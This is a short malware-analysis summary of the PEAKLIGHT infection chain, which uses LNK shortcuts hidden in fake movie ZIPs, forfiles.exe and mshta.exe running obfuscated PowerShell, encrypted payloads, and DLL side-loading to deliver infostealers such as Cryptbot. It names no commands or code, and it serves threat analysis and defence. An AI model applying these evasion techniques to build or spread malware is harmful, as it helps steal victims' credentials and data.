Analysis of complex memory-only malware that uses a multi-stage infection chain to evade detection. The attack starts with a malicious Microsoft Shortcut File (LNK) hidden in fake movie ZIP files. When executed, this file uses forfiles.exe
and mshta.exe
to run a heavily obfuscated PowerShell script, which downloads more payloads from a remote CDN. The script operates entirely in memory and uses custom decryption routines to handle encrypted payloads, protected by AES-CBC or AES-ECB and encoded in hexadecimal or Base64.
PEAKLIGHT further evades detection by employing DLL side-loading techniques to execute infostealers like Cryptbot and SHADOWLADDER malware, while dynamically unpacking ZIP files and running their contents in hidden directories. By using legitimate Windows tools and trusted content delivery networks for its operations.
Click to Open Code Editor